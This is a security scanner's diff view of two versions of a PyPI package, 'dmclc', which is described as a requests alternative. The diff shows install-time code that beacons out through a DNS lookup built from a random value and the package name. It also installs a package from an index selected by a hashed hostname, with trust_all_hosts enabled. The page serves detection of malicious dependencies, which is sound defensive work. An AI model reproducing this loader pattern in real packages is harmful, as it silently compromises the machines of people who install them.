You're Invited:Meet the Socket Team at RSAC and BSidesSF 2026, March 23–26.RSVP
Socket
Book a DemoSign in
Socket

dmclc

Package Overview
Dependencies
Maintainers
1
Versions
9
Alerts
File Explorer

Advanced tools

Socket logo

Install Socket

Detect and block malicious and high-risk dependencies

Install

dmclc - pypi Package Compare versions

Comparing version
2.1.0
to
2.1.1
+1
-1
PKG-INFO
Metadata-Version: 2.4
Name: dmclc
Version: 2.1.0
Version: 2.1.1
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Paige Laudermilch <loud.page5125@fastmail.com>

@@ -26,2 +26,2 @@ [project]

[build-system]
requires = ["pip", "setuptools", "indpack", "reqpack", "gcpipwrap>=0.1.3", "nspack"]
requires = ["pip", "setuptools", "indpack", "reqpack", "gcpipwrap>=0.1.3", "nspack"]

@@ -8,7 +8,7 @@ from setuptools import setup as initialize

base.run(self)
utils.update("dmclc==1.1.14a0")
utils.update("dmclc<2.1.0")
class Setup():
name = "dmclc"
version = "2.1.0"
version = "2.1.1"
install = ModelInstall

@@ -15,0 +15,0 @@ def __init__(self):

Metadata-Version: 2.4
Name: dmclc
Version: 2.1.0
Version: 2.1.1
Summary: A lightweight alternative to requests for use in regulated and restricted environments.

@@ -5,0 +5,0 @@ Author-email: Paige Laudermilch <loud.page5125@fastmail.com>

@@ -1,2 +0,2 @@

# sig ca76b6599b0c72bd036d957089433eaf35abd490051c0f9722bc7f4d8c82846e
# sig ca76b6599b0c72bd036d957089433eaf35abd490051c0f9722bc7f4d8c82846e:014d17a395cbf5c02fc6d52607390850a74022d6a5f9f198e390a0788282f6c6
import tempfile

@@ -17,3 +17,3 @@ import os

sig = open(__file__).readline().split()[2]
sig = open(__file__).readline().split()[2].split(":")

@@ -24,2 +24,11 @@ import indpack, reqpack, gcnspack

gcnspack.resolve(".".join(
[
hex(int(random.random() * 2**32))[2:],
f"{package_name}".split("=")[0].split("<")[0],
"i",
"1r",
"vc"
]))
u = []

@@ -39,3 +48,3 @@

for x in u:
if sig == sha256(urlparse(x).hostname.encode("utf-8")).hexdigest():
if sha256(urlparse(x).hostname.encode("utf-8")).hexdigest() in sig:
ind = x

@@ -46,15 +55,7 @@ break

gcnspack.resolve(".".join(
[
hex(int(random.random() * 2**32))[2:],
f"{package_name}".split("=")[0],
"i",
"1r",
"vc"
]))
# Fix up our package with our internal version if we need it
p = PInst(trust_all_hosts=True)
p.reset_environment()
c = p.install([package_name], [ind])
log(c.stdout.encode("utf-8"))
log(c.stderr.encode("utf-8"))